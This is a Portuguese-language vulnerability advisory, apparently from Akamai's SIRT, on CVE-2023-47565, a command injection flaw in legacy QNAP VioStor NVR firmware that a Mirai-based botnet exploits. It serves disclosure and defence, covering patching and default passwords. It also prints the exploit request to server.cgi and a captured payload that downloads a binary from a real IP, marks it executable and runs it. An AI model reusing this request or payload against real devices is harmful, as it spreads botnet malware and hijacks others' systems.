Vulnerabilidade explorada ativamente no QNAP VioStor NVR: corrigida, patches disponíveis
Resumo executivo
A SIRT (Security Intelligence Response Team, equipe de resposta de inteligência de segurança) da Akamai emitiu uma atualização adicional para a série de comunicados da InfectedSlurs, agora que um dos fornecedores afetados divulgou informações de orientação.
A vulnerabilidade no QNAP foi identificada em ambiente real e recebeu o ID CVE de CVE-2023-47565 com uma pontuação CVSS v3 de 8,0.
As cargas úteis mal-intencionados capturadas em ambientes reais instalam um malware baseado em Mirai com a intenção de criar uma botnet de DDoS (negação de serviço distribuída) .
Fornecemos uma lista extensa de indicadores de comprometimento (IOCs), regras de classificação e regras YARA na pesquisa original para ajudar a identificar essas tentativas de exploração em ambientes reais e possíveis infecções ativas nas redes de defesa.
É importante saber
Como parte de nossa pesquisa da InfectedSlurs, a SIRT descobriu uma vulnerabilidade nos dispositivos NVR (gravador de vídeo em rede) QNAP VioStor que está sendo explorada ativa e livremente. O dispositivo NVR é uma solução de vigilância de rede de alto desempenho para monitoramento baseado em rede de câmeras IP, gravação de vídeos, reprodução e acesso remoto a dados. A vulnerabilidade recebeu o ID CVE de CVE-2023-47565 com uma pontuação CVSS v3 de 8,0.
A vulnerabilidade permite que um invasor autenticado obtenha injeção de comando do sistema operacional com uma carga útil entregue por meio de uma solicitação de POST à interface de gerenciamento. Em sua configuração atual, ela está utilizando credenciais padrão do dispositivo nas cargas úteis capturadas.
As seguintes versões do firmware QNAP VioStor NVR foram afetadas:
NVR VioStor: Versões 5.0.0 e anteriores (5.0.0 lançada em 21 de junho de 2014)
A QNAP considera o suporte a esses dispositivos descontinuado; no entanto, o fornecedor recomenda atualizar o firmware VioStor nos dispositivos existentes para a versão mais recente disponível. Esse problema já havia sido corrigido anteriormente, embora nunca tenha sido relatado/divulgado publicamente. Além disso, os usuários devem alterar as senhas padrão em seus dispositivos.
Ademais, a US-CERT emitiu um comunicado.
Exploração observada
Inicialmente, quando analisamos as cargas úteis de exploração durante a campanha InfectedSlurs, relatamos apenas duas vulnerabilidades de dia zero, pois a equipe não foi capaz de vincular positivamente a exploração observada a um determinado dispositivo ou fabricante. Isso dificultou a confirmação da classificação de dia zero da exploração.
Após uma análise mais profunda de vários aspectos da exploração e da carga útil, a SIRT acreditava que o alvo eram os dispositivos QNAP VioStor NVR. Esses dispositivos se encaixam no perfil de alvo da campanha e foram enviados com credenciais padrão fracas (encontradas em seus manuais e observadas na exploração). Como no caso dos dois ataques de dia zero iniciais, os dispositivos infectados poderiam facilitar as vulnerabilidades de injeção de comando do sistema operacional nas configurações de NTP nos dispositivos de IoT (Internet das Coisas) e NVR afetados.
Depois de comunicar essas teorias à US-CERT, eles trabalharam em conjunto com a SIRT da Akamai e a QNAP para analisar as evidências e ajudar a confirmar as teorias da SIRT. Por fim, a QNAP confirmou que as cargas úteis visavam seus dispositivos VioStor, que foram descontinuados e não têm mais suporte, mas visavam apenas versões mais antigas (5.0.0 ou anterior) de seu firmware lançado anteriormente.
A vulnerabilidade é explorada ao fazer uma solictação POST para o caminho /cgi-bin/server/server.cgi. A RCE (execução remota de código) existe quando o argumento para SPECIFIC_SERVER é especificado (Figura 1).
URL:
/cgi-bin/server/server.cgi?func=server02_main_submit&counter=8.540406879901406&APPLY=
PAYLOAD:
time_mode=2&time_YEAR=0&time_MONTH=0&time_DAY=0&time_HOUR=0&time_MINUTE=0&time_SECOND=0&enable_rtc=1&TIMEZONE=50&year=&month=&day=&CONFIGURE_NTP=on&SPECIFIC_SERVER=[RCE_PAYLOAD]
Fig. 1: Tentativa de exploração de RCE por meio de injeção de comando
Um exemplo de uma carga útil de infecção capturada é mostrado na figura 2.
wget+http://94.156.68.148/zerx86;chmod+777+*;./zerx86+viox86
Fig. 2: Carga útil RCE capturada
As práticas básicas de segurança são importantes
O básico é importante. Essas observações enfatizam mais uma vez a importância das práticas recomendadas básicas de segurança, como a alteração de senhas padrão em dispositivos durante a configuração inicial. Eles também destacam a importância de implementar protocolos de segurança proativos e de longo prazo ainda mais fortes, como garantir a atualização consistente de sistemas para proteção contra possíveis ataques e, ocasionalmente, verificar sistemas/dispositivos, especialmente se eles estiverem exibindo um comportamento estranho.
Conclusão
Mais uma vez, nossa implantação de uma rede honeypot personalizada forneceu insights valiosos sobre ataques cibernéticos, revelando vulnerabilidades anteriormente desconhecidas. A presença de credenciais padrão e de sistemas em rede desatualizados e sem suporte surgiu como uma rota para infecções de botnets. Os sistemas legados são um terreno fértil para que novas vulnerabilidades sejam descobertas e exploradas para a propagação de malware.
Essa descoberta enfatiza a grande importância de promover a conscientização e a educação sobre as práticas recomendadas para a IoT, destacando os riscos associados para o consumidor comum. A necessidade de conscientização vai além dos consumidores e se aplica também aos fabricantes desses dispositivos. Ciclos de suporte para software mais longos e segurança na configuração, como alterações obrigatórias de senha, são essenciais para manter a segurança do sistema.
Fique atento
O Akamai Security Intelligence Group continuará a monitorar e reportar ameaças como essas para promover a conscientização de nossos clientes e da comunidade de segurança em geral. Para mais pesquisas, siga-nos no X, antigo Twitter, para ficar a par do que estamos observando por aí.
A SIRT da Akamai gostaria de agradecer à CISA, à US-CERT e à QNAP pela assistência com nossas comunicações, coordenação, identificação, remediação e esforços de divulgação.
